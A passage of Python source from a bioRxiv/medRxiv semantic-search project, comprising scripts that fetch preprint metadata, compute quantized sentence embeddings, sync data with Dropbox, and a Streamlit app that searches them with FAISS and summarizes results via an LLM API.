bio_embeddings_existing = np.load(biorxiv_embeddings_path, allow_pickle=True)
print(f"Existing BioRxiv data shape: {df_bio_existing.shape}, Existing BioRxiv embeddings shape: {bio_embeddings_existing.shape}")
# Determine the embedding size from existing embeddings
embedding_size = bio_embeddings_existing.shape[1]
# Prepare lists to collect new updates
bio_dfs_list = []
bio_embeddings_list = []
# Helper function to process updates from a specified directory
def process_updates(new_data_directory, updated_embeddings_directory, dfs_list, embeddings_list):
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
for data_file in new_data_files:
corresponding_embedding_file = Path(updated_embeddings_directory) / (data_file.stem + ".npy")
if corresponding_embedding_file.exists():
df = pd.read_parquet(data_file)
new_embeddings = np.load(corresponding_embedding_file, allow_pickle=True)
# Check if the number of rows in the DataFrame matches the number of rows in the embeddings
if df.shape[0] != new_embeddings.shape[0]:
print(f"Shape mismatch for {data_file.name}: DataFrame has {df.shape[0]} rows, embeddings have {new_embeddings.shape[0]} rows. Skipping.")
continue
# Check embedding size and adjust if necessary
if new_embeddings.shape[1] != embedding_size:
print(f"Skipping {data_file.name} due to embedding size mismatch.")
continue
dfs_list.append(df)
embeddings_list.append(new_embeddings)
else:
print(f"No corresponding embedding file found for {data_file.name}")
    # Process BioRxiv updates (MedRxiv updates are collected separately further below)
process_updates(db_update_bio_path, embed_update_bio_path, bio_dfs_list, bio_embeddings_list)
# Concatenate all BioRxiv updates
if bio_dfs_list:
df_bio_updates = pd.concat(bio_dfs_list)
else:
df_bio_updates = pd.DataFrame()
if bio_embeddings_list:
bio_embeddings_updates = np.vstack(bio_embeddings_list)
else:
bio_embeddings_updates = np.array([])
# Append new BioRxiv data to existing, handling duplicates as needed
df_bio_combined = pd.concat([df_bio_existing, df_bio_updates])
# Create a mask for filtering unique titles
bio_mask = ~df_bio_combined.duplicated(subset=["title"], keep="last")
df_bio_combined = df_bio_combined[bio_mask]
# Combine BioRxiv embeddings, ensuring alignment with the DataFrame
bio_embeddings_combined = (
np.vstack([bio_embeddings_existing, bio_embeddings_updates])
if bio_embeddings_updates.size
else bio_embeddings_existing
)
# Filter the embeddings based on the DataFrame unique entries
bio_embeddings_combined = bio_embeddings_combined[bio_mask]
assert df_bio_combined.shape[0] == bio_embeddings_combined.shape[0], "Shape mismatch between BioRxiv DataFrame and embeddings"
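    # Illustrative example of the mask alignment (titles are made up): for combined titles
    # ["A", "B", "A"], duplicated(subset=["title"], keep="last") gives [True, False, False],
    # so bio_mask is [False, True, True]; applying that same boolean mask to the DataFrame
    # and to the stacked embeddings drops row 0 from both and keeps them row-for-row aligned.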
print(f"Filtered BioRxiv DataFrame shape: {df_bio_combined.shape}")
print(f"Filtered BioRxiv embeddings shape: {bio_embeddings_combined.shape}")
# Save combined BioRxiv DataFrame and embeddings
combined_biorxiv_data_path = aggregated_data_path / "combined_biorxiv_data.parquet"
df_bio_combined.to_parquet(combined_biorxiv_data_path)
print(f"Saved combined BioRxiv DataFrame to {combined_biorxiv_data_path}")
combined_biorxiv_embeddings_path = "biorxiv_ubin_embaddings.npy"
np.save(combined_biorxiv_embeddings_path, bio_embeddings_combined)
print(f"Saved combined BioRxiv embeddings to {combined_biorxiv_embeddings_path}")
# Prepare lists to collect new MedRxiv updates
med_dfs_list = []
med_embeddings_list = []
process_updates(db_update_med_path, embed_update_med_path, med_dfs_list, med_embeddings_list)
# Concatenate all MedRxiv updates
if med_dfs_list:
df_med_combined = pd.concat(med_dfs_list)
else:
df_med_combined = pd.DataFrame()
if med_embeddings_list:
med_embeddings_combined = np.vstack(med_embeddings_list)
else:
med_embeddings_combined = np.array([])
last_date_in_med_database = df_med_combined['date'].max() if not df_med_combined.empty else "unknown"
# Create a mask for filtering unique titles
med_mask = ~df_med_combined.duplicated(subset=["title"], keep="last")
df_med_combined = df_med_combined[med_mask]
med_embeddings_combined = med_embeddings_combined[med_mask]
assert df_med_combined.shape[0] == med_embeddings_combined.shape[0], "Shape mismatch between MedRxiv DataFrame and embeddings"
print(f"Filtered MedRxiv DataFrame shape: {df_med_combined.shape}")
print(f"Filtered MedRxiv embeddings shape: {med_embeddings_combined.shape}")
# Save combined MedRxiv DataFrame and embeddings
combined_medrxiv_data_path = db_update_med_path / f"database_{last_date_in_med_database}.parquet"
df_med_combined.to_parquet(combined_medrxiv_data_path)
print(f"Saved combined MedRxiv DataFrame to {combined_medrxiv_data_path}")
combined_medrxiv_embeddings_path = embed_update_med_path / f"database_{last_date_in_med_database}.npy"
np.save(combined_medrxiv_embeddings_path, med_embeddings_combined)
print(f"Saved combined MedRxiv embeddings to {combined_medrxiv_embeddings_path}")
if __name__ == "__main__":
combine_databases()
| 6,048 | Python | .py | 104 | 50.653846 | 158 | 0.708221 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,184 | update_database_medarxiv.py | dzyla_biorxiv_search/update_database_medarxiv.py | import pandas as pd
import numpy as np
from pathlib import Path
import datetime
import requests
import json
import os
from datetime import datetime
from dateutil.relativedelta import relativedelta
from concurrent.futures import ThreadPoolExecutor, as_completed
from sentence_transformers import SentenceTransformer
import torch
import shutil
import dropbox
import streamlit as st
import time
def retry_on_exception(exception, retries=5, delay=2):
def decorator(func):
def wrapper(*args, **kwargs):
last_exception = None
for _ in range(retries):
try:
return func(*args, **kwargs)
except exception as e:
last_exception = e
print(f"Retrying due to: {str(e)}")
time.sleep(delay)
raise last_exception
return wrapper
return decorator
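# Usage sketch (the function below is hypothetical, not part of this script): a decorated call is
# retried up to `retries` times with `delay` seconds between attempts, and the last
# ConnectionError is re-raised only after every attempt has failed, e.g.
#
#   @retry_on_exception(requests.exceptions.ConnectionError, retries=3, delay=1)
#   def fetch_page(url):
#       return requests.get(url, timeout=10)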
@retry_on_exception(requests.exceptions.ConnectionError)
def fetch_and_save_data_block(endpoint, server, block_start, block_end, save_directory, format='json'):
base_url = f"https://api.medrxiv.org/details/{server}/"
block_interval = f"{block_start.strftime('%Y-%m-%d')}/{block_end.strftime('%Y-%m-%d')}"
block_data = []
cursor = 0
continue_fetching = True
while continue_fetching:
url = f"{base_url}{block_interval}/{cursor}/{format}"
response = requests.get(url)
if response.status_code != 200:
print(f"Failed to fetch data for block {block_interval} at cursor {cursor}. HTTP Status: {response.status_code}")
break
data = response.json()
fetched_papers = len(data['collection'])
if fetched_papers > 0:
block_data.extend(data['collection'])
cursor += fetched_papers
print(f"Fetched {fetched_papers} papers for block {block_interval}. Total fetched: {cursor}.")
else:
continue_fetching = False
if block_data:
save_data_block(block_data, block_start, block_end, endpoint, save_directory)
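# Illustrative request sequence for one monthly block (dates and cursor steps are examples only;
# the real step is however many papers the API returns per page):
#   https://api.medrxiv.org/details/medrxiv/2024-01-01/2024-01-31/0/json
#   https://api.medrxiv.org/details/medrxiv/2024-01-01/2024-01-31/100/json
# The cursor keeps advancing by the number of fetched papers until an empty collection ends the block.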
def save_data_block(block_data, start_date, end_date, endpoint, save_directory):
start_yymmdd = start_date.strftime("%y%m%d")
end_yymmdd = end_date.strftime("%y%m%d")
filename = f"{save_directory}/{endpoint}_data_{start_yymmdd}_{end_yymmdd}.json"
with open(filename, 'w') as file:
json.dump(block_data, file, indent=4)
print(f"Saved data block to {filename}")
def fetch_data(endpoint, server, interval, save_directory, format='json'):
os.makedirs(save_directory, exist_ok=True)
start_date, end_date = [datetime.strptime(date, "%Y-%m-%d") for date in interval.split('/')]
current_date = start_date
tasks = []
with ThreadPoolExecutor(max_workers=12) as executor:
while current_date <= end_date:
block_start = current_date
block_end = min(current_date + relativedelta(months=1) - relativedelta(days=1), end_date)
tasks.append(executor.submit(fetch_and_save_data_block, endpoint, server, block_start, block_end, save_directory, format))
current_date += relativedelta(months=1)
for future in as_completed(tasks):
future.result()
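# Illustrative split performed by fetch_data (dates are examples only): the interval
# "2024-01-15/2024-03-02" is submitted to the thread pool as two blocks,
# 2024-01-15..2024-02-14 and 2024-02-15..2024-03-02, i.e. month-long windows with the
# final block capped at the interval's end date.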
def load_json_to_dataframe(json_file):
with open(json_file, 'r') as file:
data = json.load(file)
return pd.DataFrame(data)
def save_dataframe(df, save_path):
df.to_parquet(save_path)
def process_json_files(directory, save_directory):
os.makedirs(save_directory, exist_ok=True)
json_files = list(Path(directory).glob('*.json'))
print(f'json_files {type(json_files)}: {json_files}')
for json_file in json_files:
df = load_json_to_dataframe(json_file)
parquet_filename = f"{json_file.stem}.parquet"
save_path = os.path.join(save_directory, parquet_filename)
if os.path.exists(save_path):
npy_file_path = save_path.replace('db_update', 'embed_update').replace('parquet', 'npy')
if os.path.exists(npy_file_path):
os.remove(npy_file_path)
print(f'Removed embedding file {npy_file_path} due to the dataframe update')
save_dataframe(df, save_path)
print(f"Processed and saved {json_file.name} to {parquet_filename}")
def load_unprocessed_parquets(db_update_directory, embed_update_directory):
db_update_directory = Path(db_update_directory)
embed_update_directory = Path(embed_update_directory)
parquet_files = list(db_update_directory.glob('*.parquet'))
npy_files = {f.stem for f in embed_update_directory.glob('*.npy')}
unprocessed_dataframes = []
for parquet_file in parquet_files:
if parquet_file.stem not in npy_files:
unprocessed_dataframes.append(parquet_file)
print(f"Loaded unprocessed Parquet file: {parquet_file.name}")
else:
print(f"Skipping processed Parquet file: {parquet_file.name}")
return unprocessed_dataframes
def connect_to_dropbox():
dropbox_APP_KEY = st.secrets["dropbox_APP_KEY"]
dropbox_APP_SECRET = st.secrets["dropbox_APP_SECRET"]
dropbox_REFRESH_TOKEN = st.secrets["dropbox_REFRESH_TOKEN"]
dbx = dropbox.Dropbox(
app_key=dropbox_APP_KEY,
app_secret=dropbox_APP_SECRET,
oauth2_refresh_token=dropbox_REFRESH_TOKEN
)
return dbx
def upload_path(local_path, dropbox_path):
dbx = connect_to_dropbox()
local_path = Path(local_path)
if local_path.is_file():
relative_path = local_path.name
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_path, dropbox_file_path, dbx)
elif local_path.is_dir():
for local_file in local_path.rglob('*'):
if local_file.is_file():
relative_path = local_file.relative_to(local_path.parent)
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_file, dropbox_file_path, dbx)
else:
print("The provided path does not exist.")
def upload_file(file_path, dropbox_file_path, dbx):
try:
dropbox_file_path = dropbox_file_path.replace('\\', '/')
try:
metadata = dbx.files_get_metadata(dropbox_file_path)
dropbox_mod_time = metadata.server_modified
local_mod_time = datetime.fromtimestamp(file_path.stat().st_mtime)
if dropbox_mod_time >= local_mod_time:
print(f"Skipped {dropbox_file_path}, Dropbox version is up-to-date.")
return
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.GetMetadataError) or e.error.is_path() and e.error.get_path().is_not_found():
print(f"No existing file on Dropbox, proceeding with upload: {dropbox_file_path}")
else:
raise e
with file_path.open('rb') as f:
dbx.files_upload(f.read(), dropbox_file_path, mode=dropbox.files.WriteMode.overwrite)
print(f"Uploaded {dropbox_file_path}")
except Exception as e:
print(f"Failed to upload {dropbox_file_path}: {str(e)}")
def load_data_embeddings():
new_data_directory = "db_update_med"
updated_embeddings_directory = "embed_update_med"
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
df_updates_list = []
embeddings_updates_list = []
for data_file in new_data_files:
# Assuming naming convention allows direct correlation
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
# Load and append DataFrame and embeddings
df_updates_list.append(pd.read_parquet(data_file))
embeddings_updates_list.append(np.load(corresponding_embedding_file))
else:
print(f"No corresponding embedding file found for {data_file.name}")
if df_updates_list:
df_updates = pd.concat(df_updates_list)
else:
df_updates = pd.DataFrame()
if embeddings_updates_list:
embeddings_updates = np.vstack(embeddings_updates_list)
else:
embeddings_updates = np.array([])
df_combined = df_updates
mask = ~df_combined.duplicated(subset=["title"], keep="last")
df_combined = df_combined[mask]
embeddings_combined = embeddings_updates
embeddings_combined = embeddings_combined[mask]
return df_combined, embeddings_combined
endpoint = "details"
server = "medrxiv"
df, embeddings = load_data_embeddings()
try:
    start_date = df['date'].max()
except Exception:
    # fall back to an early date when no previous database is available
    start_date = '1990-01-01'
last_date = datetime.today().strftime('%Y-%m-%d')
interval = f'{start_date}/{last_date}'
print(f'using interval: {interval}')
save_directory = "db_update_json_med"
fetch_data(endpoint, server, interval, save_directory)
directory = r'db_update_json_med'
save_directory = r'db_update_med'
process_json_files(directory, save_directory)
db_update_directory = 'db_update_med'
embed_update_directory = 'embed_update_med'
unprocessed_dataframes = load_unprocessed_parquets(db_update_directory, embed_update_directory)
if unprocessed_dataframes:
for file in unprocessed_dataframes:
df = pd.read_parquet(file)
query = df['abstract'].tolist()
device = "cuda" if torch.cuda.is_available() else "cpu"
model = SentenceTransformer("mixedbread-ai/mxbai-embed-large-v1")
model.to(device)
query_embedding = model.encode(query, normalize_embeddings=True, precision='ubinary', show_progress_bar=True)
file_path = os.path.basename(file).split('.')[0]
os.makedirs('embed_update_med', exist_ok=True)
embeddings_path = f'embed_update_med/{file_path}'
np.save(embeddings_path, query_embedding)
print(f'Saved embeddings {embeddings_path}')
db_update_json = 'db_update_json_med'
shutil.rmtree(db_update_json)
print(f"Directory '{db_update_json}' and its contents have been removed.")
for path in ['db_update_med', 'embed_update_med']:
upload_path(path, '/')
else:
print('Nothing to do')
| 10,836 | Python | .py | 231 | 38.991342 | 134 | 0.665394 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,185 | streamlit_app.py | dzyla_biorxiv_search/streamlit_app.py | import streamlit as st
import pandas as pd
import os
import numpy as np
from sentence_transformers import SentenceTransformer, models
import torch
from sentence_transformers.quantization import semantic_search_faiss
from pathlib import Path
import time
import plotly.express as px
import doi
import requests
from groq import Groq
import dropbox
from datetime import datetime, timedelta
API_URL = (
"https://api-inference.huggingface.co/models/mixedbread-ai/mxbai-embed-large-v1"
)
summarization_API_URL = (
"https://api-inference.huggingface.co/models/Falconsai/text_summarization"
)
LLM_API_URL = (
"https://api-inference.huggingface.co/models/HuggingFaceH4/zephyr-7b-beta"
)
API_TOKEN = st.secrets["hf_token"] # Replace with your Hugging Face API token
headers = {"Authorization": f"Bearer {API_TOKEN}"}
def query_hf_api(text, api=API_URL, parameters=None):
if not parameters:
payload = {"inputs": text}
else:
payload = {
"inputs": text,
"parameters": parameters,
}
response = requests.post(api, headers=headers, json=payload)
try:
response_data = response.json()
except requests.exceptions.JSONDecodeError:
st.error("Failed to get a valid response from the server. Please try again later.")
return {}
# Prepare an empty placeholder that can be filled if needed
progress_placeholder = st.empty()
# Check if the model is currently loading
if "error" in response_data and "loading" in response_data["error"]:
estimated_time = response_data.get("estimated_time", 30) # Default wait time to 30 seconds if not provided
with progress_placeholder.container():
st.warning(f"Model from :hugging_face: is currently loading. Estimated wait time: {estimated_time:.1f} seconds. Please wait...")
# Create a progress bar within the container
progress_bar = st.progress(0)
for i in range(int(estimated_time) + 5): # Adding a buffer time to ensure the model is loaded
# Update progress bar. The factor of 100 is used to convert to percentage completion
progress = int((i / (estimated_time + 5)) * 100)
progress_bar.progress(progress)
time.sleep(1) # Wait for a second
# Clear the placeholder once loading is complete
progress_placeholder.empty()
st.rerun() # Rerun the app after waiting
return response_data
def normalize_embeddings(embeddings):
"""
Normalizes the embeddings matrix, so that each sentence embedding has unit length.
Args:
embeddings (Tensor): The embeddings tensor to normalize.
Returns:
Tensor: The normalized embeddings.
"""
if embeddings.dim() == 1:
# Add an extra dimension if the tensor is 1-dimensional
embeddings = embeddings.unsqueeze(0)
return torch.nn.functional.normalize(embeddings, p=2, dim=1)
def quantize_embeddings(
embeddings, precision="ubinary", ranges=None, calibration_embeddings=None
):
"""
Quantizes embeddings to a specified precision using PyTorch and numpy.
Args:
embeddings (Tensor): The embeddings to quantize, assumed to be a Tensor.
precision (str): The precision to convert to.
ranges (np.ndarray, optional): Ranges for quantization.
calibration_embeddings (Tensor, optional): Embeddings used for calibration.
Returns:
Tensor: The quantized embeddings.
"""
if precision == "float32":
return embeddings.float()
if precision in ["int8", "uint8"]:
if ranges is None:
if calibration_embeddings is not None:
ranges = torch.stack(
(
torch.min(calibration_embeddings, dim=0)[0],
torch.max(calibration_embeddings, dim=0)[0],
)
)
else:
ranges = torch.stack(
(torch.min(embeddings, dim=0)[0], torch.max(embeddings, dim=0)[0])
)
starts, ends = ranges[0], ranges[1]
steps = (ends - starts) / 255
if precision == "uint8":
quantized_embeddings = torch.clip(
((embeddings - starts) / steps), 0, 255
).byte()
elif precision == "int8":
quantized_embeddings = torch.clip(
((embeddings - starts) / steps - 128), -128, 127
).char()
elif precision == "binary" or precision == "ubinary":
embeddings_np = embeddings.numpy() > 0
packed_bits = np.packbits(embeddings_np, axis=-1)
if precision == "binary":
quantized_embeddings = torch.from_numpy(packed_bits - 128).char()
else:
quantized_embeddings = torch.from_numpy(packed_bits).byte()
else:
raise ValueError(f"Precision {precision} is not supported")
return quantized_embeddings
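# Worked example for precision="ubinary" (numbers are illustrative): a row such as
#   [ 0.12, -0.40, 0.05, 0.00, -0.07, 0.33, -0.21, 0.88 ]
# is thresholded at zero to the bits 1 0 1 0 0 1 0 1, which np.packbits collapses into the single
# uint8 value 0b10100101 == 165, so a 1024-dim float vector packs down to 128 bytes.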
def process_embeddings(embeddings, precision="ubinary", calibration_embeddings=None):
"""
Normalizes and quantizes embeddings from an API list to a specified precision using PyTorch.
Args:
embeddings (list or Tensor): Raw embeddings from an external API, either as a list or a Tensor.
precision (str): Desired precision for quantization.
calibration_embeddings (Tensor, optional): Embeddings for calibration.
Returns:
Tensor: Processed embeddings, normalized and quantized.
"""
# Convert list to Tensor if necessary
if isinstance(embeddings, list):
embeddings = torch.tensor(embeddings, dtype=torch.float32)
elif not isinstance(embeddings, torch.Tensor):
st.error(embeddings)
raise TypeError(
f"Embeddings must be a list or a torch.Tensor. Message from the server: {embeddings}"
)
# Convert calibration_embeddings list to Tensor if necessary
if isinstance(calibration_embeddings, list):
calibration_embeddings = torch.tensor(
calibration_embeddings, dtype=torch.float32
)
elif calibration_embeddings is not None and not isinstance(
calibration_embeddings, torch.Tensor
):
raise TypeError(
"Calibration embeddings must be a list or a torch.Tensor if provided. "
)
normalized_embeddings = normalize_embeddings(embeddings)
quantized_embeddings = quantize_embeddings(
normalized_embeddings,
precision=precision,
calibration_embeddings=calibration_embeddings,
)
return quantized_embeddings.cpu().numpy()
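# Minimal usage sketch (the query string is an example only); this is the same pairing the search
# code further below uses before calling semantic_search_faiss:
#   raw = query_hf_api("CRISPR off-target effects")        # embedding from the HF endpoint
#   packed = process_embeddings(raw, precision="ubinary")  # packed uint8 numpy array for FAISS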
def connect_to_dropbox():
dropbox_APP_KEY = st.secrets["dropbox_APP_KEY"]
dropbox_APP_SECRET = st.secrets["dropbox_APP_SECRET"]
dropbox_REFRESH_TOKEN = st.secrets["dropbox_REFRESH_TOKEN"]
    dbx = dropbox.Dropbox(
app_key = dropbox_APP_KEY,
app_secret = dropbox_APP_SECRET,
oauth2_refresh_token = dropbox_REFRESH_TOKEN
)
return dbx
def list_files(dropbox_path):
dbx = connect_to_dropbox()
files = []
try:
response = dbx.files_list_folder(dropbox_path)
files = response.entries
except Exception as e:
st.error(f"Failed to list files: {str(e)}")
return files
def download_folder(dropbox_path, local_path):
placeholder = st.empty()
dbx = connect_to_dropbox()
try:
if not os.path.exists(local_path):
os.makedirs(local_path)
response = dbx.files_list_folder(dropbox_path)
total_files = len(response.entries)
if total_files == 0:
return
current_file = 0
for entry in response.entries:
local_file_path = Path(local_path) / entry.name
if isinstance(entry, dropbox.files.FileMetadata):
# Only download if the file does not exist locally
if not local_file_path.exists():
placeholder.write(f'Downloading {entry.name}')
dbx.files_download_to_file(str(local_file_path), entry.path_lower)
elif isinstance(entry, dropbox.files.FolderMetadata):
# Recursively download contents of the directory
download_folder(entry.path_lower, str(local_file_path))
current_file += 1
placeholder.empty()
except Exception as e:
st.error(f"Failed to download: {str(e)}")
placeholder.empty()
def download_data_from_dropbox():
    # The 24-hour check on 'last_download_time' is currently disabled, so the data is
    # refreshed on every run (download_folder still skips files that already exist locally)
    if True:
placeholder = st.empty()
placeholder.write('Downloading data...')
local_path = os.getcwd()
# Run the download function
download_folder('//', local_path)
# Update the session state with the current time
st.session_state.last_download_time = datetime.now()
placeholder.write("Download completed and data updated.")
placeholder.empty()
# Load data and embeddings
@st.cache_resource(ttl="1d")
def load_data_embeddings():
existing_data_path = "aggregated_data"
new_data_directory_bio = "db_update"
existing_embeddings_path = "biorxiv_ubin_embaddings.npy"
updated_embeddings_directory_bio = "embed_update"
new_data_directory_med = "db_update_med"
updated_embeddings_directory_med = "embed_update_med"
# Load existing database and embeddings
df_existing = pd.read_parquet(existing_data_path)
embeddings_existing = np.load(existing_embeddings_path, allow_pickle=True)
print(f"Existing data shape: {df_existing.shape}, Existing embeddings shape: {embeddings_existing.shape}")
# Determine the embedding size from existing embeddings
embedding_size = embeddings_existing.shape[1]
# Prepare lists to collect new updates
df_updates_list = []
embeddings_updates_list = []
# Helper function to process updates from a specified directory
def process_updates(new_data_directory, updated_embeddings_directory):
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
print(new_data_files)
for data_file in new_data_files:
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
df = pd.read_parquet(data_file)
new_embeddings = np.load(corresponding_embedding_file, allow_pickle=True)
# Check if the number of rows in the DataFrame matches the number of rows in the embeddings
if df.shape[0] != new_embeddings.shape[0]:
print(f"Shape mismatch for {data_file.name}: DataFrame has {df.shape[0]} rows, embeddings have {new_embeddings.shape[0]} rows. Skipping.")
continue
# Check embedding size and adjust if necessary
if new_embeddings.shape[1] != embedding_size:
print(f"Skipping {data_file.name} due to embedding size mismatch.")
continue
df_updates_list.append(df)
embeddings_updates_list.append(new_embeddings)
else:
print(f"No corresponding embedding file found for {data_file.name}")
    # Process updates from both bioRxiv and medRxiv
process_updates(new_data_directory_bio, updated_embeddings_directory_bio)
process_updates(new_data_directory_med, updated_embeddings_directory_med)
# Concatenate all updates
if df_updates_list:
df_updates = pd.concat(df_updates_list)
else:
df_updates = pd.DataFrame()
if embeddings_updates_list:
embeddings_updates = np.vstack(embeddings_updates_list)
else:
embeddings_updates = np.array([])
# Append new data to existing, handling duplicates as needed
df_combined = pd.concat([df_existing, df_updates])
# Create a mask for filtering
mask = ~df_combined.duplicated(subset=["title"], keep="last")
df_combined = df_combined[mask]
# Combine embeddings, ensuring alignment with the DataFrame
embeddings_combined = (
np.vstack([embeddings_existing, embeddings_updates])
if embeddings_updates.size
else embeddings_existing
)
# Filter the embeddings based on the dataframe unique entries
embeddings_combined = embeddings_combined[mask]
return df_combined, embeddings_combined
LLM_prompt = "Review the abstracts listed below and create a list and summary that captures their main themes and findings. Identify any commonalities across the abstracts and highlight these in your summary. Ensure your response is concise, avoids external links, and is formatted in markdown.\n\n"
def summarize_abstract(abstract, llm_model="llama-3.1-70b-versatile", instructions=LLM_prompt, api_key=st.secrets["groq_token"]):
"""
Summarizes the provided abstract using a specified LLM model.
Parameters:
    - abstract (list[str]): The abstract texts to be summarized.
- llm_model (str): The LLM model used for summarization. Defaults to "llama-3.1-70b-versatile".
Returns:
- str: A summary of the abstract, condensed into one to two sentences.
"""
# Initialize the Groq client with the API key from environment variables
client = Groq(api_key=api_key)
    formatted_text = "\n".join(f"{idx + 1}. {text}" for idx, text in enumerate(abstract))
try:
# Create a chat completion with the abstract and specified LLM model
chat_completion = client.chat.completions.create(
messages=[{"role": "user", "content": f'{instructions} "{formatted_text}"'}],
model=llm_model,
)
    except Exception:
        return 'Groq model not available or above the usage limit. Use your own API key from here: https://console.groq.com/keys'
# Return the summarized content
return chat_completion.choices[0].message.content
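# Example call (illustrative only; assumes st.secrets["groq_token"] holds a valid Groq API key):
#     summary_md = summarize_abstract(
#         ["Abstract one ...", "Abstract two ..."],
#         llm_model="llama-3.1-70b-versatile",
#     )
#     st.markdown(summary_md)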
### To use with local setup
# @st.cache_resource()
# def model_to_device():
# # Determine the device to use: use CUDA if available; otherwise, use CPU.
# device = "cuda" if torch.cuda.is_available() else "cpu"
# model = SentenceTransformer("mixedbread-ai/mxbai-embed-large-v1")
# model.to(device)
# return model
def define_style():
st.markdown(
"""
<style>
.stExpander > .stButton > button {
width: 100%;
border: none;
background-color: #f0f2f6;
color: #333;
text-align: left;
padding: 15px;
font-size: 18px;
border-radius: 10px;
margin-top: 5px;
}
.stExpander > .stExpanderContent {
padding-left: 10px;
padding-top: 10px;
}
a {
color: #FF4B4B;
text-decoration: none;
}
</style>
""",
unsafe_allow_html=True,
)
def logo(db_update_date, db_size_bio, db_size_med):
# Initialize Streamlit app
biorxiv_logo = "https://www.biorxiv.org/sites/default/files/biorxiv_logo_homepage.png"
medarxiv_logo = "https://www.medrxiv.org/sites/default/files/medRxiv_homepage_logo.png"
st.markdown(
f"""
<div style='display: flex; justify-content: center; align-items: center;'>
<div style='margin-right: 20px;'>
<img src='{biorxiv_logo}' alt='BioRxiv logo' style='max-height: 100px;'>
</div>
<div style='margin-left: 20px;'>
<img src='{medarxiv_logo}' alt='medRxiv logo' style='max-height: 100px;'>
</div>
</div>
<div style='text-align: center; margin-top: 10px;'>
<h3 style='color: black;'>Manuscript Semantic Search [bMSS]</h3>
Last database update: {db_update_date}; Database size: bioRxiv: {db_size_bio} / medRxiv: {db_size_med} entries
</div>
<br>
""",
unsafe_allow_html=True,
)
st.set_page_config(
page_title="bMSS",
page_icon=":scroll:",
)
download_data_from_dropbox()
define_style()
df, embeddings_unique = load_data_embeddings()
logo(df["date"].max(), df[df['server']=='biorxiv'].shape[0], df[df['server']=='medrxiv'].shape[0])
# model = model_to_device()
corpus_index = None
corpus_precision = "ubinary"
use_hf = False
query = st.text_input("Enter your search query:")
col1, col2 = st.columns(2)
with col1:
num_to_show = st.number_input(
"Number of results to show:", min_value=1, max_value=50, value=10
)
with col2:
use_ai = st.checkbox('Use AI generated summary?')
if use_ai:
with col2:
groq_api_provided = st.text_input('Own Groq API KEY to remove limits', '', help='To obtain own Groq key go to https://console.groq.com/keys')
if not groq_api_provided:
groq_api_provided = st.secrets["groq_token"]
#use_hf = st.checkbox('Use free HF gemma 2B instead? (poor quality)')
if query:
with st.spinner("Searching..."):
# Encode the query
search_start_time = time.time()
# query_embedding = model.encode([query], normalize_embeddings=True, precision=corpus_precision)
embedding_time = time.time()
        raw_embedding = query_hf_api(query)
        query_embedding = process_embeddings(raw_embedding)
embedding_time_total = time.time() - embedding_time
# Perform the search
results, search_time, corpus_index = semantic_search_faiss(
query_embedding,
corpus_index=corpus_index,
corpus_embeddings=embeddings_unique if corpus_index is None else None,
corpus_precision=corpus_precision,
top_k=num_to_show, # type: ignore
calibration_embeddings=None,
rescore=False,
rescore_multiplier=4,
exact=True,
output_index=True,
)
search_end_time = time.time()
search_duration = search_end_time - search_start_time
st.markdown(
f"<h6 style='text-align: center; color: #7882af;'>Search Completed in {search_duration:.2f} seconds (embeddings time: {embedding_time_total:.2f})</h3>",
unsafe_allow_html=True,
)
# Prepare the results for plotting
plot_data = {"Date": [], "Title": [], "Score": [], "DOI": [], "category": [], "server": []}
search_df = pd.DataFrame(results[0])
# Find the minimum and maximum original scores
min_score = search_df["score"].min()
max_score = search_df["score"].max()
        # Invert the scores so that the best (lowest) raw distance is displayed as the highest value
        # and the worst (highest) raw distance as the lowest; the original [min, max] range is preserved.
search_df["score"] = abs(search_df["score"] - max_score) + min_score
abstracts = []
# Iterate over each row in the search_df DataFrame
for index, entry in search_df.iterrows():
row = df.iloc[int(entry["corpus_id"])]
# Construct the DOI link
try:
doi_link = f"{doi.get_real_url_from_doi(row['doi'])}"
            except Exception:
                doi_link = 'https://www.doi.org/' + row['doi']
# Append information to plot_data for visualization
plot_data["Date"].append(row["date"])
plot_data["Title"].append(row["title"])
plot_data["Score"].append(search_df["score"][index]) # type: ignore
plot_data["DOI"].append(row["doi"])
plot_data["category"].append(row["category"])
plot_data["server"].append(row["server"])
#summary_text = summarize_abstract(row['abstract'])
with st.expander(f"{index+1}\. {row['title']}"): # type: ignore
col1, col2 = st.columns(2)
col1.markdown(f"**Score:** {entry['score']:.1f}")
col2.markdown(f"**Server:** [{row['server']}]")
st.markdown(f"**Authors:** {row['authors']}")
col1, col2 = st.columns(2)
col2.markdown(f"**Category:** {row['category']}")
col1.markdown(f"**Date:** {row['date']}")
#st.markdown(f"**Summary:**\n{summary_text}", unsafe_allow_html=False)
abstracts.append(row['abstract'])
st.markdown(
f"**Abstract:**\n{row['abstract']}", unsafe_allow_html=False
)
st.markdown(
f"**[Full Text Read]({doi_link})** 🔗", unsafe_allow_html=True
)
plot_df = pd.DataFrame(plot_data)
# Convert 'Date' to datetime if it's not already in that format
plot_df["Date"] = pd.to_datetime(plot_df["Date"])
# Sort the DataFrame based on the Date to make sure it's ordered
plot_df = plot_df.sort_values(by="Date")
if use_ai:
if not use_hf:
ai_gen_start = time.time()
st.markdown('**AI Summary of 10 abstracts:**')
            st.markdown(summarize_abstract(abstracts[:10], api_key=str(groq_api_provided)))
total_ai_time = time.time()-ai_gen_start
st.markdown(f'**Time to generate summary:** {total_ai_time:.2f} s')
        # Need to figure out how to get it from huggingface
else:
ai_gen_start = time.time()
st.markdown('**AI Summary of 10 abstracts:**')
            formatted_text = str(LLM_prompt+"\n".join(f"{idx + 1}. {abstract}" for idx, abstract in enumerate(abstracts[:10])))
prompt = f"Human: \n {formatted_text}\n\n AI:"
LLM_answer = query_hf_api(formatted_text, summarization_API_URL)[0] #['generated_text']
